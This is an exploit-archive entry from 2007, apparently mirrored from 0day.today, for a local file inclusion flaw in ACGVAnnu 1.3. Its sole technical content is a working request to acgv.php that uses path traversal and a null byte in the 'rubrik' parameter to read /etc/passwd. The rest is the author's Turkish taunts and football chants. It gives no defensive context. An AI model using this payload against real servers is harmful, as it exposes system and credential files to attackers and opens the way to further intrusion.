id: 1843
date: 05/06/2007
title: ACGVAnnu <= 1.3 (acgv.php rubrik) Local File Inclusion Vulnerability
author: BeyazKurt
cves: 

====================================================================
ACGVAnnu <= 1.3 (acgv.php rubrik) Local File Inclusion Vulnerability
====================================================================



# BeyazKurt 
#
# ACGV Annu (rubrik) Local File Inclusion Exploit
#
# Lamerler ortada kol geziyo aman dikkat ! Tr0jan kazas?na denk gelmeyin !!
#
# rerere rararara bjk bjk MUAHAHAH
#
# Fincan? tastan oyarlar aman?n oyarlar besiktasa boyle ... bjk'e boyle ... !!


/theme/acgv.php?rubrik=../../../etc/passwd%00



#  0day.today [2023-03-23]  #